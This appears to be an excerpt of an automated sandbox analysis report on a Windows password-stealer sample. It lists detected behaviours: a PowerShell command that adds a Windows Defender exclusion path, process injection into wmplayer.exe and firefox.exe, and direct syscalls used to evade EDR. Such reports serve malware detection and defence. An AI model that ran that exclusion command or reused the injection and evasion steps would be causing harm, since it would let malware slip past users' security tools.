            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312750 mov eax, dword ptr fs:[00000030h]6_2_03312750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E3740 mov eax, dword ptr fs:[00000030h]6_2_032E3740
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E3740 mov eax, dword ptr fs:[00000030h]6_2_032E3740
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E3740 mov eax, dword ptr fs:[00000030h]6_2_032E3740
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A3749 mov eax, dword ptr fs:[00000030h]6_2_033A3749
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D0750 mov eax, dword ptr fs:[00000030h]6_2_032D0750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330674D mov esi, dword ptr fs:[00000030h]6_2_0330674D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330674D mov eax, dword ptr fs:[00000030h]6_2_0330674D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330674D mov eax, dword ptr fs:[00000030h]6_2_0330674D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D07AF mov eax, dword ptr fs:[00000030h]6_2_032D07AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A37B6 mov eax, dword ptr fs:[00000030h]6_2_033A37B6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF7BA mov eax, dword ptr fs:[00000030h]6_2_032CF7BA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h]6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h]6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h]6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h]6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335F7AF mov eax, dword ptr fs:[00000030h]6_2_0335F7AF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033597A9 mov eax, dword ptr fs:[00000030h]6_2_033597A9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD7B0 mov eax, dword ptr fs:[00000030h]6_2_032FD7B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F78A mov eax, dword ptr fs:[00000030h]6_2_0338F78A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F27ED mov eax, dword ptr fs:[00000030h]6_2_032F27ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F27ED mov eax, dword ptr fs:[00000030h]6_2_032F27ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F27ED mov eax, dword ptr fs:[00000030h]6_2_032F27ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DD7E0 mov ecx, dword ptr fs:[00000030h]6_2_032DD7E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D47FB mov eax, dword ptr fs:[00000030h]6_2_032D47FB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D47FB mov eax, dword ptr fs:[00000030h]6_2_032D47FB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DC7C0 mov eax, dword ptr fs:[00000030h]6_2_032DC7C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D57C0 mov eax, dword ptr fs:[00000030h]6_2_032D57C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D57C0 mov eax, dword ptr fs:[00000030h]6_2_032D57C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D57C0 mov eax, dword ptr fs:[00000030h]6_2_032D57C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033507C3 mov eax, dword ptr fs:[00000030h]6_2_033507C3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D262C mov eax, dword ptr fs:[00000030h]6_2_032D262C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE627 mov eax, dword ptr fs:[00000030h]6_2_032EE627
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF626 mov eax, dword ptr fs:[00000030h]6_2_032CF626
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A5636 mov eax, dword ptr fs:[00000030h]6_2_033A5636
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03306620 mov eax, dword ptr fs:[00000030h]6_2_03306620
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03308620 mov eax, dword ptr fs:[00000030h]6_2_03308620
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E260B mov eax, dword ptr fs:[00000030h]6_2_032E260B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03312619 mov eax, dword ptr fs:[00000030h]6_2_03312619
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330F603 mov eax, dword ptr fs:[00000030h]6_2_0330F603
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03301607 mov eax, dword ptr fs:[00000030h]6_2_03301607
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D3616 mov eax, dword ptr fs:[00000030h]6_2_032D3616
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D3616 mov eax, dword ptr fs:[00000030h]6_2_032D3616
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E609 mov eax, dword ptr fs:[00000030h]6_2_0334E609
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03302674 mov eax, dword ptr fs:[00000030h]6_2_03302674
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330A660 mov eax, dword ptr fs:[00000030h]6_2_0330A660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330A660 mov eax, dword ptr fs:[00000030h]6_2_0330A660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03309660 mov eax, dword ptr fs:[00000030h]6_2_03309660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03309660 mov eax, dword ptr fs:[00000030h]6_2_03309660
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339866E mov eax, dword ptr fs:[00000030h]6_2_0339866E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339866E mov eax, dword ptr fs:[00000030h]6_2_0339866E
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EC640 mov eax, dword ptr fs:[00000030h]6_2_032EC640
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033066B0 mov eax, dword ptr fs:[00000030h]6_2_033066B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD6AA mov eax, dword ptr fs:[00000030h]6_2_032CD6AA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD6AA mov eax, dword ptr fs:[00000030h]6_2_032CD6AA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330C6A6 mov eax, dword ptr fs:[00000030h]6_2_0330C6A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C76B2 mov eax, dword ptr fs:[00000030h]6_2_032C76B2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C76B2 mov eax, dword ptr fs:[00000030h]6_2_032C76B2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C76B2 mov eax, dword ptr fs:[00000030h]6_2_032C76B2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335368C mov eax, dword ptr fs:[00000030h]6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335368C mov eax, dword ptr fs:[00000030h]6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335368C mov eax, dword ptr fs:[00000030h]6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0335368C mov eax, dword ptr fs:[00000030h]6_2_0335368C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D4690 mov eax, dword ptr fs:[00000030h]6_2_032D4690
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D4690 mov eax, dword ptr fs:[00000030h]6_2_032D4690
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033506F1 mov eax, dword ptr fs:[00000030h]6_2_033506F1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033506F1 mov eax, dword ptr fs:[00000030h]6_2_033506F1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h]6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h]6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h]6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334E6F2 mov eax, dword ptr fs:[00000030h]6_2_0334E6F2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338D6F0 mov eax, dword ptr fs:[00000030h]6_2_0338D6F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD6E0 mov eax, dword ptr fs:[00000030h]6_2_032FD6E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FD6E0 mov eax, dword ptr fs:[00000030h]6_2_032FD6E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033636EE mov eax, dword ptr fs:[00000030h]6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033636EE mov eax, dword ptr fs:[00000030h]6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033636EE mov eax, dword ptr fs:[00000030h]6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033636EE mov eax, dword ptr fs:[00000030h]6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033636EE mov eax, dword ptr fs:[00000030h]6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033636EE mov eax, dword ptr fs:[00000030h]6_2_033636EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033036EF mov eax, dword ptr fs:[00000030h]6_2_033036EF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h]6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h]6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h]6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h]6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h]6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DB6C0 mov eax, dword ptr fs:[00000030h]6_2_032DB6C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033916CC mov eax, dword ptr fs:[00000030h]6_2_033916CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.csReference to suspicious API methods: GetProcAddress(_EE20_0E7E_0670_EE4C_ECB5_EE6F_EEC3_08F8_0658_FE75_EC8D_EE0E_EED3_EE29_061F_EE20_0609_0670_EC98, _EED7_EE62_EED2_EED2_EE36_06E7_08D4_EE79_0EA6_EEDD_08C8_EECC_EEDB_EEBC_0E79_EEFA_0658_EEAB)
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)_EEB7_0E67_EC93_EEA7_0650_08E9_EEDC_EC7A_066B_ECBE_EEFC_08F7_EE31_EE92_0653_08EC.Length, 64u, out var _EC93_065B_EE29_08EE_06E7)
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.csReference to suspicious API methods: LoadLibrary(_EE23_EECD_EE92_EE00_EED9_0E69_EEB8_0E6F_EE1E_EEE6_EE08_EE56_EEC8_EE11_0651_EC7E_0605_08EB(_EE36_EE50_060A_EE59_08E2_EEE7_08E5_0658_EEF6_EE7A_066C_08F7_EEA1_EE16_EE1B_EC9F._EE88_0614_EEF8_EED2_ECAA))
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -ForceJump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\sc.exeThread register set: target process: 2876Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\sc.exeThread APC queued: target process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2B19008Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -ForceJump to behavior
